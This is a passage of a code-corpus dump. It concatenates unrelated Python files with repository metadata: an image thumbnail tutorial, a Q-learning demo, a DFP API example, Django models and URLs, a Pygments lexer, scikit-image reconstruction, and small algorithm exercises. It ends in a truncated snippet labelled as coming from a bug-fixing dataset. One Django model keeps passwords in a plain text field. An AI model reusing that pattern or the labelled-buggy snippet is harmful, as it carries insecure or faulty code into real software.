若发生错误,先更新错误,再切换网络
第二种:使用pycharm进行安装
'''
from PIL import Image
# 打开图片,生成一个image对象
im = Image.open('ppp.jpg')
# 从打开的图片中获取图片信息
# im.format:图片格式信息
# im.size:图片尺寸
print(im.format, im.size)
# 设置图片的尺寸,生成缩略图
im.thumbnail((500, 200))
# 另存为,参数一:图片名,参数二:图片格式
im.save('pppp.jpg', 'JPEG')
| [
"waynechen1994@163.com"
] | waynechen1994@163.com |
692ffcf5c4f607be9f55703706c8341c7ac328f9 | 16640092d62417c32677ee2f7c63a913c11de51a | /test.py | ba098b066ee0dc2ba43422cf0389de84cad9cdf9 | [] | no_license | reakain/rob538hw2 | 2cacd5ea0c394d262420093f31c50acd029322ff | 07249df900380353020be57ce8a4eebed904e904 | refs/heads/main | 2022-12-25T17:11:08.513206 | 2020-10-13T03:10:24 | 2020-10-13T03:10:24 | 303,574,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,769 | py | # from https://amunategui.github.io/reinforcement-learning/index.html
import numpy as np
import pylab as plt
# map cell to cell, add circular cell to goal point
points_list = [(0,1), (1,5), (5,6), (5,4), (1,2), (2,3), (2,7)]
goal = 7
import networkx as nx
G=nx.Graph()
G.add_edges_from(points_list)
pos = nx.spring_layout(G)
nx.draw_networkx_nodes(G,pos)
nx.draw_networkx_edges(G,pos)
nx.draw_networkx_labels(G,pos)
plt.show()
# how many points in graph? x points
MATRIX_SIZE = 8
# create matrix x*y
R = np.matrix(np.ones(shape=(MATRIX_SIZE, MATRIX_SIZE)))
R *= -1
# assign zeros to paths and 100 to goal-reaching point
for point in points_list:
print(point)
if point[1] == goal:
R[point] = 100
else:
R[point] = 0
if point[0] == goal:
R[point[::-1]] = 100
else:
# reverse of point
R[point[::-1]]= 0
# add goal point round trip
R[goal,goal]= 100
Q = np.matrix(np.zeros([MATRIX_SIZE,MATRIX_SIZE]))
# learning parameter
gamma = 0.8
initial_state = 1
def available_actions(state):
current_state_row = R[state,]
av_act = np.where(current_state_row >= 0)[1]
return av_act
available_act = available_actions(initial_state)
def sample_next_action(available_actions_range):
next_action = int(np.random.choice(available_act,1))
return next_action
action = sample_next_action(available_act)
def update(current_state, action, gamma):
max_index = np.where(Q[action,] == np.max(Q[action,]))[1]
if max_index.shape[0] > 1:
max_index = int(np.random.choice(max_index, size = 1))
else:
max_index = int(max_index)
max_value = Q[action, max_index]
Q[current_state, action] = R[current_state, action] + gamma * max_value
print('max_value', R[current_state, action] + gamma * max_value)
if (np.max(Q) > 0):
return(np.sum(Q/np.max(Q)*100))
else:
return (0)
update(initial_state, action, gamma)
# Training
scores = []
for i in range(700):
current_state = np.random.randint(0, int(Q.shape[0]))
available_act = available_actions(current_state)
action = sample_next_action(available_act)
score = update(current_state,action,gamma)
scores.append(score)
print ('Score:', str(score))
print("Trained Q matrix:")
print(Q/np.max(Q)*100)
# Testing
current_state = 0
steps = [current_state]
while current_state != 7:
next_step_index = np.where(Q[current_state,] == np.max(Q[current_state,]))[1]
if next_step_index.shape[0] > 1:
next_step_index = int(np.random.choice(next_step_index, size = 1))
else:
next_step_index = int(next_step_index)
steps.append(next_step_index)
current_state = next_step_index
print("Most efficient path:")
print(steps)
plt.plot(scores)
plt.show() | [
"reakain@users.noreply.github.com"
] | reakain@users.noreply.github.com |
f8c13f56bef005c37b573d17ed303454226ba230 | 7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a | /examples/adspygoogle/dfp/v201101/get_lica.py | 121e4466b8d92878321c9c97d2374a5552ef0e28 | [
"Apache-2.0"
] | permissive | hockeyprincess/google-api-dfp-python | 534519695ffd26341204eedda7a8b50648f12ea9 | efa82a8d85cbdc90f030db9d168790c55bd8b12a | refs/heads/master | 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a line item creative association (LICA) by the line
item and creative id. To determine which line items exist, run
get_all_line_items.py. To determine which creatives exit, run
get_all_creatives.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set line item and creative id to use to retrieve the LICA.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
creative_id = 'INSERT_CREATIVE_ID_HERE'
# Get LICA.
lica = lica_service.GetLineItemCreativeAssociation(line_item_id, creative_id)[0]
# Display results.
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['lineItemId'], lica['creativeId'],
lica['status']))
| [
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] | api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138 |
048ac96b3f749f1c876f5b098fc2d9c763c14bfd | c418bd9d730bc17653611da7f0642bdd25cba65f | /djangosite/myapp/models.py | 24937ec6ecd5ae57cc064366c022229598fdac16 | [] | no_license | ErDeepakSingh/Ajax-State-City | ae18a4f4b8ef8e90932d8aed74553897d7ac9b3b | 72a31424bd9402ef2c76198ee80934ac399fccf9 | refs/heads/master | 2020-08-16T02:29:36.081445 | 2019-10-16T02:51:22 | 2019-10-16T02:51:22 | 215,443,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.db import models
# Create your models here.
class Student(models.Model):
name = models.CharField(max_length=25)
email = models.EmailField(unique=True)
joined = models.DateTimeField(auto_now_add=True)
phone = models.CharField(max_length=10, default='')
password = models.CharField(max_length=16, default='')
def __str__(self):
return self.email + " - " + self.phone
| [
"deepakthakur755@gmail.com"
] | deepakthakur755@gmail.com |
82dac2f11d268d0f7a2d30e10b1a6ca670013859 | 9c4e02ba5201794a4c5cbff548db1be7c87409c1 | /venv/lib/python3.9/site-packages/pygments/lexers/trafficscript.py | 67ecd243cb3c15db119f07cd6007ebb986f19d42 | [
"MIT",
"Apache-2.0"
] | permissive | ClassWizard/PodLockParser | 4faf4679d404158b3cf2b1ceb4faabca461b0008 | 84f6d3fced521849657d21ae4cb9681f5897b957 | refs/heads/master | 2022-12-23T20:39:48.096729 | 2022-02-08T09:49:01 | 2022-02-08T09:49:01 | 167,668,617 | 2 | 1 | MIT | 2022-12-14T10:01:41 | 2019-01-26T08:50:35 | Python | UTF-8 | Python | false | false | 1,512 | py | """
pygments.lexers.trafficscript
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lexer for RiverBed's TrafficScript (RTS) language.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer
from pygments.token import String, Number, Name, Keyword, Operator, Text, Comment
__all__ = ['RtsLexer']
class RtsLexer(RegexLexer):
"""
For `Riverbed Stingray Traffic Manager <http://www.riverbed.com/stingray>`_
.. versionadded:: 2.1
"""
name = 'TrafficScript'
aliases = ['trafficscript', 'rts']
filenames = ['*.rts']
tokens = {
'root' : [
(r"'(\\\\|\\[^\\]|[^'\\])*'", String),
(r'"', String, 'escapable-string'),
(r'(0x[0-9a-fA-F]+|\d+)', Number),
(r'\d+\.\d+', Number.Float),
(r'\$[a-zA-Z](\w|_)*', Name.Variable),
(r'(if|else|for(each)?|in|while|do|break|sub|return|import)', Keyword),
(r'[a-zA-Z][\w.]*', Name.Function),
(r'[-+*/%=,;(){}<>^.!~|&\[\]\?\:]', Operator),
(r'(>=|<=|==|!=|'
r'&&|\|\||'
r'\+=|.=|-=|\*=|/=|%=|<<=|>>=|&=|\|=|\^=|'
r'>>|<<|'
r'\+\+|--|=>)', Operator),
(r'[ \t\r]+', Text),
(r'#[^\n]*', Comment),
],
'escapable-string' : [
(r'\\[tsn]', String.Escape),
(r'[^"]', String),
(r'"', String, '#pop'),
],
}
| [
"chenlongwei@camera360.com"
] | chenlongwei@camera360.com |
ff9be30ad7a3fb60856edfe43f45d57c5a03eb04 | b9a2097b1ff526f0f980cb44f321ecdecc071baf | /backend/nwh_elkhart_metrics_26614/urls.py | 8e7b3ab44b091f930ad0b1b58e0f93406437830a | [] | no_license | crowdbotics-apps/nwh-elkhart-metrics-26614 | ce08c984d6c939b7f7cd5158b5c39fe37be94dcc | e86088482281f83fe789ce0b492e76981df1c08c | refs/heads/master | 2023-05-01T08:17:44.464562 | 2021-05-12T18:42:43 | 2021-05-12T18:42:43 | 366,794,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,580 | py | """nwh_elkhart_metrics_26614 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
path("api/v1/", include("chat.api.v1.urls")),
path("chat/", include("chat.urls")),
path("api/v1/", include("chat_user_profile.api.v1.urls")),
path("chat_user_profile/", include("chat_user_profile.urls")),
path("home/", include("home.urls")),
path("api/v1/", include("users.api.v1.urls")),
]
admin.site.site_header = "NWH Elkhart Metrics"
admin.site.site_title = "NWH Elkhart Metrics Admin Portal"
admin.site.index_title = "NWH Elkhart Metrics Admin"
# swagger
api_info = openapi.Info(
title="NWH Elkhart Metrics API",
default_version="v1",
description="API documentation for NWH Elkhart Metrics App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
urlpatterns += [path("", TemplateView.as_view(template_name="index.html"))]
urlpatterns += [
re_path(r"^(?:.*)/?$", TemplateView.as_view(template_name="index.html"))
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
94cf66b41704c274309334be3fe3b838b8a69b17 | 304a2c58a1bd0713b876d093a39a21f3fc7bd3d1 | /skimage/morphology/greyreconstruct.py | 9e447800d30f9549466eb9c8f628a5c0124ea194 | [
"BSD-3-Clause"
] | permissive | ludwigschwardt/scikits-image | 72042e548aa9004d94dbb3da518134be28ba0f4b | 571151958f94842c642f0a17b73968757326e672 | refs/heads/master | 2023-09-05T02:28:15.470227 | 2012-08-27T10:16:40 | 2012-08-27T10:16:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,158 | py | """
This morphological reconstruction routine was adapted from CellProfiler, code
licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
import numpy as np
from skimage.filter._rank_order import rank_order
def reconstruction(seed, mask, method='dilation', selem=None, offset=None):
"""Perform a morphological reconstruction of an image.
Morphological reconstruction by dilation is similar to basic morphological
dilation: high-intensity values will replace nearby low-intensity values.
The basic dilation operator, however, uses a structuring element to
determine how far a value in the input image can spread. In contrast,
reconstruction uses two images: a "seed" image, which specifies the values
that spread, and a "mask" image, which gives the maximum allowed value at
each pixel. The mask image, like the structuring element, limits the spread
of high-intensity values. Reconstruction by erosion is simply the inverse:
low-intensity values spread from the seed image and are limited by the mask
image, which represents the minimum allowed value.
Alternatively, you can think of reconstruction as a way to isolate the
connected regions of an image. For dilation, reconstruction connects
regions marked by local maxima in the seed image: neighboring pixels
less-than-or-equal-to those seeds are connected to the seeded region.
Local maxima with values larger than the seed image will get truncated to
the seed value.
Parameters
----------
seed : ndarray
The seed image (a.k.a. marker image), which specifies the values that
are dilated or eroded.
mask : ndarray
The maximum (dilation) / minimum (erosion) allowed value at each pixel.
method : {'dilation'|'erosion'}
Perform reconstruction by dilation or erosion. In dilation (or
erosion), the seed image is dilated (or eroded) until limited by the
mask image. For dilation, each seed value must be less than or equal
to the corresponding mask value; for erosion, the reverse is true.
selem : ndarray
The neighborhood expressed as a 2-D array of 1's and 0's.
Returns
-------
reconstructed : ndarray
The result of morphological reconstruction.
Examples
--------
>>> import numpy as np
>>> from skimage.morphology import reconstruction
First, we create a sinusoidal mask image w/ peaks at middle and ends.
>>> x = np.linspace(0, 4 * np.pi)
>>> y_mask = np.cos(x)
Then, we create a seed image initialized to the minimum mask value (for
reconstruction by dilation, min-intensity values don't spread) and add
"seeds" to the left and right peak, but at a fraction of peak value (1).
>>> y_seed = y_mask.min() * np.ones_like(x)
>>> y_seed[0] = 0.5
>>> y_seed[-1] = 0
>>> y_rec = reconstruction(y_seed, y_mask)
The reconstructed image (or curve, in this case) is exactly the same as the
mask image, except that the peaks are truncated to 0.5 and 0. The middle
peak disappears completely: Since there were no seed values in this peak
region, its reconstructed value is truncated to the surrounding value (-1).
As a more practical example, we try to extract the bright features of an
image by subtracting a background image created by reconstruction.
>>> y, x = np.mgrid[:20:0.5, :20:0.5]
>>> bumps = np.sin(x) + np.sin(y)
To create the background image, set the mask image to the original image,
and the seed image to the original image with an intensity offset, `h`.
>>> h = 0.3
>>> seed = bumps - h
>>> background = reconstruction(seed, bumps)
The resulting reconstructed image looks exactly like the original image,
but with the peaks of the bumps cut off. Subtracting this reconstructed
image from the original image leaves just the peaks of the bumps
>>> hdome = bumps - background
This operation is known as the h-dome of the image and leaves features
of height `h` in the subtracted image.
Notes
-----
The algorithm is taken from:
[1] Robinson, "Efficient morphological reconstruction: a downhill filter",
Pattern Recognition Letters 25 (2004) 1759-1767.
Applications for greyscale reconstruction are discussed in:
[2] Vincent, L., "Morphological Grayscale Reconstruction in Image Analysis:
Applications and Efficient Algorithms", IEEE Transactions on Image
Processing (1993)
[3] Soille, P., "Morphological Image Analysis: Principles and Applications",
Chapter 6, 2nd edition (2003), ISBN 3540429883.
"""
assert tuple(seed.shape) == tuple(mask.shape)
if method == 'dilation' and np.any(seed > mask):
raise ValueError("Intensity of seed image must be less than that "
"of the mask image for reconstruction by dilation.")
elif method == 'erosion' and np.any(seed < mask):
raise ValueError("Intensity of seed image must be greater than that "
"of the mask image for reconstruction by erosion.")
try:
from ._greyreconstruct import reconstruction_loop
except ImportError:
raise ImportError("_greyreconstruct extension not available.")
if selem is None:
selem = np.ones([3] * seed.ndim, dtype=bool)
else:
selem = selem.copy()
if offset == None:
if not all([d % 2 == 1 for d in selem.shape]):
ValueError("Footprint dimensions must all be odd")
offset = np.array([d // 2 for d in selem.shape])
# Cross out the center of the selem
selem[[slice(d, d + 1) for d in offset]] = False
# Make padding for edges of reconstructed image so we can ignore boundaries
padding = (np.array(selem.shape) / 2).astype(int)
dims = np.zeros(seed.ndim + 1, dtype=int)
dims[1:] = np.array(seed.shape) + 2 * padding
dims[0] = 2
inside_slices = [slice(p, -p) for p in padding]
# Set padded region to minimum image intensity and mask along first axis so
# we can interleave image and mask pixels when sorting.
if method == 'dilation':
pad_value = np.min(seed)
elif method == 'erosion':
pad_value = np.max(seed)
images = np.ones(dims) * pad_value
images[[0] + inside_slices] = seed
images[[1] + inside_slices] = mask
# Create a list of strides across the array to get the neighbors within
# a flattened array
value_stride = np.array(images.strides[1:]) / images.dtype.itemsize
image_stride = images.strides[0] / images.dtype.itemsize
selem_mgrid = np.mgrid[[slice(-o, d - o)
for d, o in zip(selem.shape, offset)]]
selem_offsets = selem_mgrid[:, selem].transpose()
nb_strides = np.array([np.sum(value_stride * selem_offset)
for selem_offset in selem_offsets], np.int32)
images = images.flatten()
# Erosion goes smallest to largest; dilation goes largest to smallest.
index_sorted = np.argsort(images).astype(np.int32)
if method == 'dilation':
index_sorted = index_sorted[::-1]
# Make a linked list of pixels sorted by value. -1 is the list terminator.
prev = -np.ones(len(images), np.int32)
next = -np.ones(len(images), np.int32)
prev[index_sorted[1:]] = index_sorted[:-1]
next[index_sorted[:-1]] = index_sorted[1:]
# Cython inner-loop compares the rank of pixel values.
if method == 'dilation':
value_rank, value_map = rank_order(images)
elif method == 'erosion':
value_rank, value_map = rank_order(-images)
value_map = -value_map
start = index_sorted[0]
reconstruction_loop(value_rank, prev, next, nb_strides, start, image_stride)
# Reshape reconstructed image to original image shape and remove padding.
rec_img = value_map[value_rank[:image_stride]]
rec_img.shape = np.array(seed.shape) + 2 * padding
return rec_img[inside_slices]
| [
"tsyu80@gmail.com"
] | tsyu80@gmail.com |
97baeed7c56a0db84cf7856d975f4a404250a4bf | f321c54e5745a21e41842c1cdccaefa5256d918c | /magnetos/utils/string_utils.py | e285d77142c2a32673e542aecca927e326123fca | [
"MIT"
] | permissive | gitshaozhong/magnetos | 5104f90782ac03a2b0b5c86b7333d72b1c27338c | f48dcd7450a46d619dcbe64c11c9aa1c119cd307 | refs/heads/master | 2022-01-05T10:06:04.193597 | 2019-07-12T00:54:05 | 2019-07-12T00:54:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # -*- coding: utf-8 -*-
# Created by restran on 2017/9/26
from __future__ import unicode_literals, absolute_import
def fixed_length_split(data, width):
"""
固定长度分割字符串
:param data:
:param width:
:return:
"""
# 使用正则的方法
# import re
# split = re.findall(r'.{%s}' % width, string)
return [data[x: x + width] for x in range(0, len(data), width)]
| [
"grestran@gmail.com"
] | grestran@gmail.com |
1b5ec767df5eb39a49ccdf40dca40eea62760f90 | 0fa82ccc0b93944c4cbb8255834b019cf16d128d | /2020/TopNBuzzWords.py | ace88f6781b44057f221aa1f992be9d1b7504886 | [] | no_license | Akashdeepsingh1/project | 6ad477088a3cae2d7eea818a7bd50a2495ce3ba8 | bdebc6271b39d7260f6ab5bca37ab4036400258f | refs/heads/master | 2022-12-13T23:09:35.782820 | 2020-08-27T14:22:37 | 2020-08-27T14:22:37 | 279,722,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | '''
You work on a team whose job is to understand the most sought after toys for the holiday season. A teammate of yours has built a webcrawler that extracts a list of quotes about toys from different articles. You need to take these quotes and identify which toys are mentioned most frequently. Write an algorithm that identifies the top N toys out of a list of quotes and list of toys.
Your algorithm should output the top N toys mentioned most frequently in the quotes.
Input:
The input to the function/method consists of five arguments:
numToys, an integer representing the number of toys
topToys, an integer representing the number of top toys your algorithm needs to return;
toys, a list of strings representing the toys,
numQuotes, an integer representing the number of quotes about toys;
quotes, a list of strings that consists of space-sperated words representing articles about toys
Output:
Return a list of strings of the most popular N toys in order of most to least frequently mentioned
Note:
The comparison of strings is case-insensitive. If the value of topToys is more than the number of toys, return the names of only the toys mentioned in the quotes. If toys are mentioned an equal number of times in quotes, sort alphabetically.
Example 1:
Input:
numToys = 6
topToys = 2
toys = ["elmo", "elsa", "legos", "drone", "tablet", "warcraft"]
numQuotes = 6
quotes = [
"Elmo is the hottest of the season! Elmo will be on every kid's wishlist!",
"The new Elmo dolls are super high quality",
"Expect the Elsa dolls to be very popular this year, Elsa!",
"Elsa and Elmo are the toys I'll be buying for my kids, Elsa is good",
"For parents of older kids, look into buying them a drone",
"Warcraft is slowly rising in popularity ahead of the holiday season"
];
Output:
["elmo", "elsa"]
'''
def solution(quotes, numToys,topToys, toys):
from collections import defaultdict
from heapq import heapify,heappush,nlargest
import re
working_dic = defaultdict(int)
for line in quotes:
temp = re.sub(r'''[,!.;'"]+'''," ",line).lower().split()
for word in temp:
if str(word) in toys:
working_dic[word]+=1
import operator
sorted_d = sorted (working_dic.items (), key=operator.itemgetter (1))
working_list = []
heapify(working_list)
for k,v in working_dic.items():
heappush(working_list,(v,k))
print('{} {}'.format(k,v))
t = nlargest(topToys,working_list)
final_list = []
for each in t:
final_list.append(each[1])
return final_list
numToys = 6
topToys = 2
toys = ["elmo", "elsa", "legos", "drone", "tablet", "warcraft"]
numQuotes = 6
quotes = [
"Elmo is the hottest of the season! Elmo will be on every kid's wishlist!",
"The new Elmo dolls are super high quality",
"Expect the Elsa dolls to be very popular this year, Elsa!",
"Elsa and Elmo are the toys I'll be buying for my kids, Elsa is good",
"For parents of older kids, look into buying them a drone",
"Warcraft is slowly rising in popularity ahead of the holiday season"
]
print (solution (quotes, numToys, topToys, toys)) | [
"Akashdeep_S@Dell.com"
] | Akashdeep_S@Dell.com |
631d16757e7af9733f9944dc7b6eabb43ed2f47e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02691/s319336614.py | 171ddfd157899a75a6f611fe7687282c54e7f3f4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | import sys
from functools import lru_cache
from collections import defaultdict
inf = float('inf')
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10**6)
def input(): return sys.stdin.readline().rstrip()
def read():
return int(readline())
def reads():
return map(int, readline().split())
x=read()
a=list(reads())
dic=[]
dic2=defaultdict(int)
for i in range(x):
dic.append(i+a[i])
dic2[i-a[i]]+=1
ans=0
#print(dic,dic2)
for i in dic:
ans+=dic2[i]
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
49ac678e7399622d7dbfa5d8fa346354eeae6c27 | c73fc798764f40ea6fa466a573fb01223e367ce3 | /sorting_algo/bubble_sort13_08_3.py | ec228d9d7c593673db252adc5d40e3d6bc431de2 | [] | no_license | mohitsh/python_work | b1385f62104aa6b932f5452ca5c2421526345455 | 223a802dea5cdb73f44a159856c7432983655668 | refs/heads/master | 2020-04-24T00:34:15.427060 | 2018-08-21T19:12:07 | 2018-08-21T19:12:07 | 37,491,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py |
def bubble_sort(alist):
for passnum in range(len(alist)-1,0,-1):
for i in range(passnum):
if alist[i] > alist[i+1]:
temp = alist[i]
alist[i] = alist[i+1]
alist[i+1] = temp
return alist
alist = [9,8,7,6,5,4,3,2,1,0]
print alist
print bubble_sort(alist)
| [
"mohitsh114@gmail.com"
] | mohitsh114@gmail.com |
5fe4808fdc7b9720b6dae56130107ff7859b3d6b | 6ceea2578be0cbc1543be3649d0ad01dd55072aa | /src/fipy/solvers/trilinos/preconditioners/jacobiPreconditioner.py | 3e0dbb4faff0fe48dc559db8e9f7fb07afb4f0e3 | [
"LicenseRef-scancode-public-domain"
] | permissive | regmi/fipy | 57972add2cc8e6c04fda09ff2faca9a2c45ad19d | eb4aacf5a8e35cdb0e41beb0d79a93e7c8aacbad | refs/heads/master | 2020-04-27T13:51:45.095692 | 2010-04-09T07:32:42 | 2010-04-09T07:32:42 | 602,099 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,916 | py | #!/usr/bin/env python
##
# -*-Pyth-*-
# ###################################################################
# FiPy - Python-based finite volume PDE solver
#
# FILE: "jacobiPreconditioner.py"
#
# Author: Jonathan Guyer <guyer@nist.gov>
# Author: Daniel Wheeler <daniel.wheeler@nist.gov>
# Author: James Warren <jwarren@nist.gov>
# Author: Maxsim Gibiansky <maxsim.gibiansky@nist.gov>
# mail: NIST
# www: http://www.ctcms.nist.gov/fipy/
#
# ========================================================================
# This software was developed at the National Institute of Standards
# and Technology by employees of the Federal Government in the course
# of their official duties. Pursuant to title 17 Section 105 of the
# United States Code this software is not subject to copyright
# protection and is in the public domain. FiPy is an experimental
# system. NIST assumes no responsibility whatsoever for its use by
# other parties, and makes no guarantees, expressed or implied, about
# its quality, reliability, or any other characteristic. We would
# appreciate acknowledgement if the software is used.
#
# This software can be redistributed and/or modified freely
# provided that any derivative works bear some notice that they are
# derived from it, and any modified versions bear some notice that
# they have been modified.
# ========================================================================
#
# ###################################################################
##
__docformat__ = 'restructuredtext'
from PyTrilinos import AztecOO
from fipy.solvers.trilinos.preconditioners.preconditioner import Preconditioner
class JacobiPreconditioner(Preconditioner):
"""
Jacobi Preconditioner for Trilinos solvers.
"""
def _applyToSolver(self, solver, matrix):
solver.SetAztecOption(AztecOO.AZ_precond, AztecOO.AZ_Jacobi)
| [
"regmisk@gmail.com"
] | regmisk@gmail.com |
2ef23df228ff2888553798a422f860c67c12f531 | 9b4de05054f37a65dce49857fb6a809a370b23ca | /gd/migrations/0015_auto_20171223_1531.py | 689f60c8c2b35e98aa6e6472d8595be6fc32c8c3 | [] | no_license | susahe/gis | f6b03b8f23abf7ca22c0069a4cdf603bfe879808 | 6b8d433cd5f672994ac138c1b656136425d0c345 | refs/heads/master | 2021-05-12T01:50:12.862559 | 2018-01-27T02:25:31 | 2018-01-27T02:25:31 | 117,569,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # Generated by Django 2.0 on 2017-12-23 15:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gd', '0014_auto_20171222_2045'),
]
operations = [
migrations.AlterField(
model_name='person',
name='p_birthdate',
field=models.DateField(default='1/1/1977', verbose_name='උපන්දිනය'),
),
migrations.AlterField(
model_name='person',
name='p_donation',
field=models.CharField(choices=[('SD', 'සමෘද්ධි සහනාධාරය'), ('PD', 'මහජන ආධාර'), ('DD', 'රෝගාධාර'), ('SD', 'ශිෂ්\u200dයාධාර'), ('ED', 'වැඩිහිටි ආධාර')], default='SD', max_length=20, verbose_name='රජයෙන් ලබන ආධාර'),
),
migrations.AlterField(
model_name='person',
name='p_edu',
field=models.CharField(choices=[('PS', 'පාසල් යාමට පෙර'), ('PR', 'පෙර පාසැල්'), ('OF', '1-5 ශ්\u200dරේණිය දක්වා'), ('FO', '5 සිට සා/පෙළ දක්වා'), ('OP', 'සාමන්\u200dය පෙළ සමත්'), ('UA', 'උසස් පෙළ දක්වා'), ('AP', 'උසස් පෙළ සමත්'), ('DG', 'උපාධි හා ඊට ඉහල'), ('NS', 'කිසිදා පසැල් නොගිය')], default='OP', max_length=10, verbose_name='අධ්\u200dයාපන සුදුසුකම්'),
),
]
| [
"sumudu.susahe@gmail.com"
] | sumudu.susahe@gmail.com |
16510b4dbee33035e4fd00ce92137fff7639b46b | 9c74814f9bf90529d5ccd7a1dcebe062235ca67c | /third_party/saltedge/test/test_oauth_reconnect_request_body.py | 1c76997806170372a731a2fa2c93794dbc1cbd38 | [
"MIT"
] | permissive | ltowarek/budget-supervisor | 63196fe7cef78f0f54a25891d65870745cc7cf49 | 618e01e15a7a76ed870dafccda399720a02b068b | refs/heads/master | 2021-12-15T06:41:37.531689 | 2021-11-08T19:51:58 | 2021-11-08T19:53:03 | 26,971,315 | 1 | 0 | MIT | 2021-07-04T10:56:24 | 2014-11-21T17:56:36 | Python | UTF-8 | Python | false | false | 1,000 | py | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.oauth_reconnect_request_body import OauthReconnectRequestBody # noqa: E501
from swagger_client.rest import ApiException
class TestOauthReconnectRequestBody(unittest.TestCase):
"""OauthReconnectRequestBody unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOauthReconnectRequestBody(self):
"""Test OauthReconnectRequestBody"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.oauth_reconnect_request_body.OauthReconnectRequestBody() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"lukasz.towarek@gmail.com"
] | lukasz.towarek@gmail.com |
2439b6370f69f389a08685af7bde72b0f33ded1f | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/ac7e62ec08d10df30b76ffd035b8d449a1a097d9-<target_login>-bug.py | 51ff00075ca0161b03de61784815c1b6a53ae43d | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | def target_login(module, target):
node_auth = module.params['node_auth']
node_user = module.params['node_user']
node_pass = module.params['node_pass']
if node_user:
